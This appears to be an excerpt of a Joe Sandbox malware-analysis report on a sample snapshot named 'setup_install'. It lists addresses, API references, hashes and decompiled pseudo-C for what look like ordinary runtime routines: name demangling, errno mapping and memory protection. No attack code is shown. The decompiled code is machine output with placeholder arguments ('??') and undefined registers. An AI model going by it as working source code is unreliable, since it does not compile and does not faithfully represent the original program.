0x0040984a
0x0040584c
0x00405859
0x0040585c
0x00405864
0x00405869
0x0040587a
0x00409c5d
0x00409c63
0x00409c65
0x00409c65
0x00409c78
0x00409c78
0x0040587f
0x00405885
0x00405887
0x0040588f
0x00405899
0x004096f7
0x004096ff
0x00409709
0x00409c53
0x00409c53
0x0040971b
0x0040589f
0x004058a9
0x004058b1
0x004058b8
0x004058c0
0x004058c4
0x004058c7
0x004058cd
0x004058d4
0x004058d4
0x004058e4
0x004058e7
0x004058f1
0x004058f5
0x00405904
0x00405913
0x0040591b
0x00405922
0x0040592a
0x0040592e
0x00405931
0x00405937
0x0040593e
0x0040593e
0x0040594e
0x00405951
0x00405957
0x0040595b
0x0040595b
0x00405962
0x00405968
0x00409aef
0x00409af6
0x00000000
0x00409b08
0x00409b12
0x00409b1a
0x00409b21
0x00409b29
0x00409b2d
0x00409b30
0x00409b36
0x00409b3d
0x00409b3d
0x00409b4d
0x00409b50
0x00409b56
0x00409b5a
0x00409b5e
0x00409b68
0x00409b68
0x00409b71
0x00000000
0x00409b71
0x0040596e
0x0040596e
0x0040596e
0x00405971
0x00405975
0x00405975
0x0040597e
0x00000000
0x0040597e

APIs

strcmp.MSVCRT ref: 0040585C
strcmp.MSVCRT ref: 00405892

Strings

), xrefs: 00409B5E
6-J, xrefs: 004096F7

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strcmp
String ID: )$6-J
API String ID: 1004003707-3009866050
Opcode ID: 361ba582d03b9aebd3f248819fd9c52f8296360d7650d0328d0eb791fa49e72a
Instruction ID: a0c672a4e7d3d2ab7b6c3a41d07cc6200afe0c329659b1faacfcbc108b6b1e0c
Opcode Fuzzy Hash: 361ba582d03b9aebd3f248819fd9c52f8296360d7650d0328d0eb791fa49e72a
Instruction Fuzzy Hash: 8FD1D674508245CFCB11DF28C0C47AABBE1AF55318F0985BAEC885F35BC3799885DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004070C0, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 141COMMON

Download Yara Rule

Strings

}, xrefs: 004088FC
parm#, xrefs: 004070D7
this, xrefs: 0040840E
'1J, xrefs: 00408903

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID: '1J$parm#$this$}
API String ID: 0-3285699825
Opcode ID: b929afbefd18abbbd351c06f08e31bb94bac7f68f1a7beb9cdad0424f01af73e
Instruction ID: d302f8122ad1392ba0843f1518272d88725a38557e9ac77a4fedc8c0497aaa4e
Opcode Fuzzy Hash: b929afbefd18abbbd351c06f08e31bb94bac7f68f1a7beb9cdad0424f01af73e
Instruction Fuzzy Hash: F8615F7150D2428BCB11CF28C0C43A97BE1AFA5304F1885BEECC99F386DB799885DB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040621C, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 113
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040621C(intOrPtr __eax, void* __ebx, intOrPtr __edi) {
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t65;
				intOrPtr _t67;
				void* _t70;

				_t65 = __edi;
				_t62 = __ebx;
				_t61 = __eax;
				if( *((intOrPtr*)( *((intOrPtr*)(_t70 + 0xc)))) != 0x3a ||  *__edx != 0x3b) {
					 *((intOrPtr*)(_t62 + 0x118)) = 1;
					_t67 =  *((intOrPtr*)(_t70 + 4)) - 1;
				} else {
					__eax = __ebp + 0xc;
					__ecx =  *(__ebp + 8);
					__edx = __esp[0x18];
					 *__esp = __ebp + 0xc;
					__eax = __ebx;
					if(E0040B550(__ebx,  *(__ebp + 8), __esp[0x18]) != 0) {
						__edi =  *(__ebp + 4);
						__eax = __esp[0x34];
						__esi =  *(__ebp + 4) - 1;
						 *((intOrPtr*)(__ebx + 0x11c)) =  *((intOrPtr*)(__ebx + 0x11c)) - 1;
					} else {
						__eax =  *(__ebp + 0xc);
						__edi =  *(__ebp + 8);
						__esi =  *(__eax + 8);
						__eax =  *(__eax + 0xc);
						__edx =  *(__eax + 8);
						__eax =  *(__eax + 0xc);
						__esp[4] = 0x4a2d3f;
						__esp[0x1c] = __eax;
						__eax = __edi[8];
						__esp[0x20] = __edx;
						__eax =  *(__edi[8]);
						 *__esp =  *(__edi[8]);
						if(strcmp(??, ??) != 0) {
							__ecx = 4;
							__edx = "new ";
							__ebx = E00402650(__ebx, 4, "new ");
							if(__esi[8] != 0) {
								__edx = __esp[0x18];
								__ecx = __esi;
								__ebx = E0040B460(__ebx, __esi, __esp[0x18]);
								if( *(__ebx + 0x100) == 0xff) {
									__eax =  *(__ebx + 0x10c);
									 *((char*)(__ebx + 0xff)) = 0;
									__esp[4] = 0xff;
									__esp[8] =  *(__ebx + 0x10c);
									 *__esp = __ebx;
									__eax =  *((intOrPtr*)(__ebx + 0x108))();
									 *((intOrPtr*)(__ebx + 0x128)) =  *((intOrPtr*)(__ebx + 0x128)) + 1;
									 *(__ebx + 0x100) = 0;
								}
								_t40 =  &(( *(__ebx + 0x100))[1]); // 0x100
								__edx = _t40;
								 *(__ebx + 0x100) = _t40;
								( *(__ebx + 0x100))[__ebx] = 0x20;
								 *((char*)(__ebx + 0x104)) = 0x20;
							}
							__ecx = __esp[0x20];
							__edx = __esp[0x18];
							__ebx = E00405780(__ebx, __esp[0x20], __esp[0x18]);
							if(__esp[0x1c] == 0) {
								_t57 = __ebp + 4; // 0x4a2d3f
								__edi =  *_t57;
								__eax = __esp[0x34];
								__esi =  *_t57 - 1;
								 *((intOrPtr*)(__ebx + 0x11c)) =  *((intOrPtr*)(__ebx + 0x11c)) - 1;
							} else {
								__ecx = __esp[0x1c];
								__edx = __esp[0x18];
								__ebx = E0040B460(__ebx, __esp[0x1c], __esp[0x18]);
								_t49 = __ebp + 4; // 0x4a2d3f
								__edi =  *_t49;
								__eax = __esp[0x34];
								__esi =  *_t49 - 1;
								 *((intOrPtr*)(__ebx + 0x11c)) =  *((intOrPtr*)(__ebx + 0x11c)) - 1;
							}
						} else {
							__ecx = __esi;
							__esi = __esp[0x18];
							__eax = __ebx;
							__edx = __esi;
							__eax = E0040B460(__ebx, __ecx, __esi);
							__ecx = __edi;
							__edx = __esi;
							__ebx = E0040B3C0(__ebx, __edi, __esi);
							__ecx = __esp[0x20];
							__edx = __esi;
							__ebx = E0040B460(__ebx, __esp[0x20], __esi);
							__ecx = 3;
							__edx = " : ";
							__ebx = E00402650(__ebx, 3, " : ");
							__ecx = __esp[0x1c];
							__edx = __esi;
							__ebx = E0040B460(__ebx, __esp[0x1c], __esi);
							_t24 = __ebp + 4; // 0x4a2d3f
							__edi =  *_t24;
							__eax = __esp[0x34];
							__esi =  *_t24 - 1;
							 *((intOrPtr*)(__ebx + 0x11c)) =  *((intOrPtr*)(__ebx + 0x11c)) - 1;
						}
					}
				}
				 *((intOrPtr*)(_t62 + 0x12c)) = _t61;
				 *((intOrPtr*)(_t70 + 4)) = _t67;
				 *((intOrPtr*)(_t62 + 0x11c)) = _t65;
				return _t61;
			}

0x0040621c
0x0040621c
0x0040621c
0x00406222
0x00406230
0x0040623d
0x004095f2
0x004095f2
0x004095f5
0x004095f8
0x004095fc
0x004095ff
0x00409608
0x00409c33
0x00409c36
0x00409c3a
0x00409c43
0x0040960e
0x0040960e
0x00409611
0x00409614
0x00409617
0x0040961a
0x0040961d
0x00409620
0x00409628
0x0040962c
0x0040962f
0x00409633
0x00409635
0x0040963f
0x00409b79
0x00409b7e
0x00409b85
0x00409b8e
0x00409b90
0x00409b94
0x00409b98
0x00409ba7
0x00409ba9
0x00409baf
0x00409bb6
0x00409bbe
0x00409bc2
0x00409bc5
0x00409bcb
0x00409bd2
0x00409bd2
0x00409be2
0x00409be2
0x00409be5
0x00409beb
0x00409bef
0x00409bef
0x00409bf6
0x00409bfa
0x00409c00
0x00409c0a
0x00409c82
0x00409c82
0x00409c85
0x00409c89
0x00409c92
0x00409c0c
0x00409c0c
0x00409c10
0x00409c16
0x00409c1b
0x00409c1b
0x00409c1e
0x00409c22
0x00409c2b
0x00409c2b
0x00409645
0x00409645
0x00409647
0x0040964b
0x0040964d
0x0040964f
0x00409654
0x00409656
0x0040965a
0x0040965f
0x00409663
0x00409667
0x0040966c
0x00409671
0x00409678
0x0040967d
0x00409681
0x00409685
0x0040968a
0x0040968a
0x0040968d
0x00409691
0x0040969a
0x0040969a
0x0040963f
0x00409608
0x00405981
0x00405987
0x0040598a
0x0040599a

APIs

strcmp.MSVCRT ref: 00409638

Strings

new , xrefs: 00409B7E
?-J, xrefs: 0040968A
: , xrefs: 00409671
, xrefs: 00409BEF

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strcmp
String ID: $ : $?-J$new
API String ID: 1004003707-2338113314
Opcode ID: 98451aa4af4d00bbb075049cc0229e1d71db83e09725be49f9f46549e6abd714
Instruction ID: 8f3d8b288d74802297faae600f5be0d129f0ec1916885049d55d4bca4ca93320
Opcode Fuzzy Hash: 98451aa4af4d00bbb075049cc0229e1d71db83e09725be49f9f46549e6abd714
Instruction Fuzzy Hash: 32512975608209CFCB00DF28C48469AB7E1EF98314F15857AEC896B396C778ED4ACF95

Uniqueness

Uniqueness Score: -1.00%

Function 00405CC4, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

unnamed type#, xrefs: 00405CCA
'1J, xrefs: 0040806D
q3J, xrefs: 00405CCF
}, xrefs: 00408066

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID: '1J$q3J$unnamed type#$}
API String ID: 0-2385433160
Opcode ID: 94ab84d091c69dfdca40bab604306b525afe529d56b210c220b7a777a7ded69e
Instruction ID: da790e1f82838a58a82db951125fa0b4947de346142beccb1fa88684339746cb
Opcode Fuzzy Hash: 94ab84d091c69dfdca40bab604306b525afe529d56b210c220b7a777a7ded69e
Instruction Fuzzy Hash: 3541727150C2428BCB11CF28C0843AA7BE1AF55304F1984BEECC98F386D7799889DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00490A90, Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00490AAA
strlen.MSVCRT ref: 00490AF5
memcpy.MSVCRT ref: 00490B12
setlocale.MSVCRT ref: 00490B26
setlocale.MSVCRT ref: 00490B5C

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 17fdc17812214bcac1212845d5aab1835fa72eb0f0913958ea130b9c379fbb05
Instruction ID: f709b3e35441daa93af73d142f39506b888c9b4cc7372e60d5790adc489d7308
Opcode Fuzzy Hash: 17fdc17812214bcac1212845d5aab1835fa72eb0f0913958ea130b9c379fbb05
Instruction Fuzzy Hash: 7321E2B0A093009FD740EF69D58165EFBE0EF88358F41892EF5C8D7302E77898818B86

Uniqueness

Uniqueness Score: -1.00%

Function 004124B5, Relevance: 7.5, APIs: 5, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004124B5(intOrPtr* __eax, intOrPtr _a4) {
				intOrPtr* _t10;
				intOrPtr* _t11;
				signed int _t12;
				signed int _t13;
				intOrPtr _t15;

				_t13 = _t12 ^ _t12;
				_t15 = _a4;
				L0041B608();
				 *__eax = _t15;
				_t10 = 1;
				L3:
				L3:
				if(_t15 != _t10) {
					goto L1;
				} else {
					L0041B5C8();
					 *_t10 =  *((intOrPtr*)(0x4a5224 + _t13 * 8));
					return _t10;
				}
				L10:
				L1:
				_t13 = _t13 + 1;
				if( *((intOrPtr*)(0x4a5224 + _t13 * 8)) == 0xffffffff) {
					_t11 = _t15 - 0x13;
					if(_t11 <= 0x11) {
						L0041B5C8();
						 *_t11 = 0xd;
						return _t11;
					} else {
						if(_t15 - 0xbc <= 0xe) {
							L0041B5C8();
							 *_t11 = 8;
							return _t11;
						} else {
							L0041B5C8();
							 *_t11 = 0x16;
							return _t11;
						}
					}
				} else {
					_t10 =  *((intOrPtr*)(0x4a5220 + _t13 * 8));
					goto L3;
				}
				goto L10;
			}

0x004124c2
0x004124c7
0x004124cb
0x004124d0
0x004124d2
0x00000000
0x004124f4
0x004124f6
0x00000000
0x004124f8
0x004124f8
0x00412504
0x0041250b
0x0041250b
0x00000000
0x004124e0
0x004124e0
0x004124eb
0x00412510
0x00412516
0x00412545
0x0041254a
0x00412555
0x00412518
0x00412521
0x00412534
0x00412539
0x00412544
0x00412523
0x00412523
0x00412528
0x00412533
0x00412533
0x00412521
0x004124ed
0x004124ed
0x00000000
0x004124ed
0x00000000

APIs

__doserrno.MSVCRT ref: 004124CB
_errno.MSVCRT ref: 004124F8

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 75e58a74d853161847362a9f76ac0ca7dd26fe959275e7913c087d2c41dafb83
Instruction ID: ac7385424120b7086625732c49fcc20a59642a1c4ed916833d734d26b3f990fc
Opcode Fuzzy Hash: 75e58a74d853161847362a9f76ac0ca7dd26fe959275e7913c087d2c41dafb83
Instruction Fuzzy Hash: 4601B1B38041115FE7506B18BD813DEB792FB02338F060AB7D4546B260E379ACE58BC6

Uniqueness

Uniqueness Score: -1.00%

Function 00407462, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407462(intOrPtr __ebx) {
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr _t91;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t100 = __ebx;
				_t114 =  *((intOrPtr*)(__ebx + 0x148));
				_t110 =  *((intOrPtr*)(__ebx + 0x114));
				 *((intOrPtr*)(__ebx + 0x148)) = _t116;
				 *((intOrPtr*)(__ebx + 0x114)) = 0;
				_t102 =  *((intOrPtr*)(_t116 + 8));
				if(( *(_t118 + 0x18) & 0x00000004) == 0) {
					L4:
					E00405780(_t100, _t102,  *(_t118 + 0x18));
					if( *((char*)(_t100 + 0x104)) == 0x3c) {
						if( *((intOrPtr*)(_t100 + 0x100)) == 0xff) {
							 *((char*)(_t100 + 0xff)) = 0;
							 *((intOrPtr*)(_t118 + 4)) = 0xff;
							 *((intOrPtr*)(_t118 + 8)) =  *((intOrPtr*)(_t100 + 0x10c));
							 *_t118 = _t100;
							 *((intOrPtr*)(_t100 + 0x108))();
							 *((intOrPtr*)(_t100 + 0x128)) =  *((intOrPtr*)(_t100 + 0x128)) + 1;
							 *((intOrPtr*)(_t100 + 0x100)) = 0;
						}
						_t72 =  *((intOrPtr*)(_t100 + 0x100)) + 1; // 0x100
						 *((intOrPtr*)(_t100 + 0x100)) = _t72;
						 *((char*)(_t100 +  *((intOrPtr*)(_t100 + 0x100)))) = 0x20;
						 *((char*)(_t100 + 0x104)) = 0x20;
					}
					_t87 =  *((intOrPtr*)(_t100 + 0x100));
					if(_t87 == 0xff) {
						 *((char*)(_t100 + 0xff)) = 0;
						 *((intOrPtr*)(_t118 + 4)) = 0xff;
						 *((intOrPtr*)(_t118 + 8)) =  *((intOrPtr*)(_t100 + 0x10c));
						 *_t118 = _t100;
						 *((intOrPtr*)(_t100 + 0x108))();
						 *((intOrPtr*)(_t100 + 0x128)) =  *((intOrPtr*)(_t100 + 0x128)) + 1;
						_t87 = 0;
					}
					 *((intOrPtr*)(_t100 + 0x100)) = _t87 + 1;
					 *((char*)(_t100 + _t87)) = 0x3c;
					 *((char*)(_t100 + 0x104)) = 0x3c;
					E00405780(_t100,  *((intOrPtr*)(_t116 + 0xc)),  *(_t118 + 0x18));
					if( *((char*)(_t100 + 0x104)) == 0x3e) {
						if( *((intOrPtr*)(_t100 + 0x100)) == 0xff) {
							 *((char*)(_t100 + 0xff)) = 0;
							 *((intOrPtr*)(_t118 + 4)) = 0xff;
							 *((intOrPtr*)(_t118 + 8)) =  *((intOrPtr*)(_t100 + 0x10c));
							 *_t118 = _t100;
							 *((intOrPtr*)(_t100 + 0x108))();
							 *((intOrPtr*)(_t100 + 0x128)) =  *((intOrPtr*)(_t100 + 0x128)) + 1;
							 *((intOrPtr*)(_t100 + 0x100)) = 0;
						}
						_t58 =  *((intOrPtr*)(_t100 + 0x100)) + 1; // 0x100
						 *((intOrPtr*)(_t100 + 0x100)) = _t58;
						 *((char*)(_t100 +  *((intOrPtr*)(_t100 + 0x100)))) = 0x20;
						 *((char*)(_t100 + 0x104)) = 0x20;
						goto L8;
					} else {
						L8:
						_t91 =  *((intOrPtr*)(_t100 + 0x100));
						if(_t91 == 0xff) {
							 *((char*)(_t100 + 0xff)) = 0;
							 *((intOrPtr*)(_t118 + 4)) = 0xff;
							 *((intOrPtr*)(_t118 + 8)) =  *((intOrPtr*)(_t100 + 0x10c));
							 *_t118 = _t100;
							 *((intOrPtr*)(_t100 + 0x108))();
							 *((intOrPtr*)(_t100 + 0x128)) =  *((intOrPtr*)(_t100 + 0x128)) + 1;
							_t91 = 0;
						}
						 *((intOrPtr*)(_t100 + 0x100)) = _t91 + 1;
						 *((char*)(_t100 + _t91)) = 0x3e;
						 *((char*)(_t100 + 0x104)) = 0x3e;
						goto L11;
					}
				} else {
					__eax =  *__ecx;
					if(__eax != 0 ||  *((intOrPtr*)(__ecx + 0xc)) != 6) {
						goto L4;
					} else {
						 *((intOrPtr*)(__esp + 8)) = 6;
						 *(__esp + 4) = "JArray";
						__eax =  *((intOrPtr*)(__ecx + 8));
						 *((intOrPtr*)(__esp + 0x1c)) = __ecx;
						 *__esp = __eax;
						L0041B438();
						__ecx =  *((intOrPtr*)(__esp + 0x1c));
						if(__eax != 0) {
							goto L4;
						}
						__ecx =  *((intOrPtr*)(__ebp + 0xc));
						__edx =  *((intOrPtr*)(__esp + 0x18));
						__ebx = E00405780(__ebx,  *((intOrPtr*)(__ebp + 0xc)),  *((intOrPtr*)(__esp + 0x18)));
						__ecx = 2;
						__edx = "[]";
						__ebx = E00402650(__ebx, 2, "[]");
						L11:
						 *((intOrPtr*)(_t100 + 0x114)) = _t110;
						_t43 = _t116 + 4; // 0x4a312e
						 *((intOrPtr*)(_t100 + 0x148)) = _t114;
						_t83 =  *((intOrPtr*)(_t118 + 0x34));
						_t114 =  *_t43 - 1;
						_t110 =  *((intOrPtr*)(_t100 + 0x11c)) - 1;
						 *((intOrPtr*)(_t100 + 0x12c)) = _t83;
						 *((intOrPtr*)(_t116 + 4)) = _t114;
						 *((intOrPtr*)(_t100 + 0x11c)) = _t110;
						return _t83;
					}
				}
			}

0x00407462
0x00407462
0x00407468
0x0040746e
0x00407474
0x0040747e
0x00407486
0x00407498
0x0040749e
0x004074aa
0x00408f71
0x00408f79
0x00408f80
0x00408f88
0x00408f8c
0x00408f8f
0x00408f95
0x00408f9c
0x00408f9c
0x00408fac
0x00408faf
0x00408fb5
0x00408fb9
0x00408fb9
0x004074b0
0x004074bb
0x004074c3
0x004074ca
0x004074d2
0x004074d6
0x004074d9
0x004074df
0x004074e6
0x004074e6
0x004074eb
0x004074f5
0x004074fb
0x00407505
0x00407511
0x00408f13
0x00408f1b
0x00408f22
0x00408f2a
0x00408f2e
0x00408f31
0x00408f37
0x00408f3e
0x00408f3e
0x00408f4e
0x00408f51
0x00408f57
0x00408f5b
0x00000000
0x00407517
0x00407517
0x00407517
0x00407522
0x0040752a
0x00407531
0x00407539
0x0040753d
0x00407540
0x00407546
0x0040754d
0x0040754d
0x00407552
0x00407558
0x0040755c
0x00000000
0x0040755c
0x00407488
0x00407488
0x0040748c
0x00000000
0x004099e4
0x004099e4
0x004099ec
0x004099f4
0x004099f7
0x004099fb
0x004099fe
0x00409a03
0x00409a09
0x00000000
0x00000000
0x00409a0f
0x00409a12
0x00409a18
0x00409a1d
0x00409a22
0x00409a29
0x00407563
0x00407563
0x00407569
0x0040756c
0x00407572
0x00407576
0x0040757f
0x00405981
0x00405987
0x0040598a
0x0040599a
0x0040599a
0x0040748c

APIs

_strncoll.MSVCRT ref: 004099FE

Strings

, xrefs: 00408FB9
51J, xrefs: 00409A22
.1J, xrefs: 00407569

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: _strncoll
String ID: $.1J$51J
API String ID: 4138090636-109550766
Opcode ID: 6173ee43d657b3e5c619c659a6fe0e08ff62bf64ceb3835f3ffdda735cac345d
Instruction ID: 85330b09748245f88d21b27e72086bb2164b35547ec837d47edf97a86d00aa5e
Opcode Fuzzy Hash: 6173ee43d657b3e5c619c659a6fe0e08ff62bf64ceb3835f3ffdda735cac345d
Instruction Fuzzy Hash: 9D51C870508242CBDB11CF28C4C87E57BE1AF55308F1885BAEC885F39BD7B99885DB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 0040C4AD

Strings

@, xrefs: 0040C4F8

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: QueryVirtual
String ID: @
API String ID: 1804819252-2766056989
Opcode ID: 026a038e71e204bf772048eb62565f1fe24a9df71d7cc0d9cb552569d0361a3e
Instruction ID: 4547ceba227156a1a80befcd3c32033d93a007a526bfc21f3ed83dc823eb81ac
Opcode Fuzzy Hash: 026a038e71e204bf772048eb62565f1fe24a9df71d7cc0d9cb552569d0361a3e
Instruction Fuzzy Hash: 0B415B72904301DFC710DF69D9C461ABBE4FF94364F458A3EE9989B292E334A844CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4DC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E0040C4DC(void* __ebx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a20, signed int _a32, signed int _a40) {
				void* _v16;
				char _v32;
				void* _v45;
				long _v48;
				signed int _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				signed int _v72;
				signed int _v100;
				signed int _t85;
				long _t86;
				void* _t91;
				int _t101;
				long _t104;
				signed int _t106;
				intOrPtr _t110;
				signed int _t120;
				signed int _t121;
				signed int _t123;
				long _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				long _t134;
				signed int _t135;
				long** _t137;
				signed int _t139;
				long _t142;
				intOrPtr _t149;
				long _t150;
				signed int _t151;
				signed int _t153;
				long _t157;
				long _t158;
				signed int _t160;
				long _t161;
				void* _t163;
				signed int _t165;
				signed int _t169;
				long _t170;
				intOrPtr _t172;
				DWORD* _t173;
				signed char* _t175;
				long _t179;
				intOrPtr _t181;
				long _t182;
				intOrPtr* _t185;
				signed int* _t191;
				void* _t192;
				intOrPtr* _t193;
				intOrPtr* _t196;

				while(1) {
					_t149 = _t131 +  *0x4e64a4;
					_t129 = _a20;
					_t169 = _a32;
					 *(_t149 + 4) = _t129;
					 *((intOrPtr*)(_t149 + 8)) = _t169;
					_a12 = _t149;
					_a8 = 0x40;
					_a4 = _t169;
					 *_t191 = _t129;
					_t127 = VirtualProtect(??, ??, ??, ??);
					_t191 = _t191 - 0x10;
					__eflags = _t127;
					if(_t127 != 0) {
						break;
					}
					_t85 = GetLastError();
					 *_t191 = 0x4a4a54;
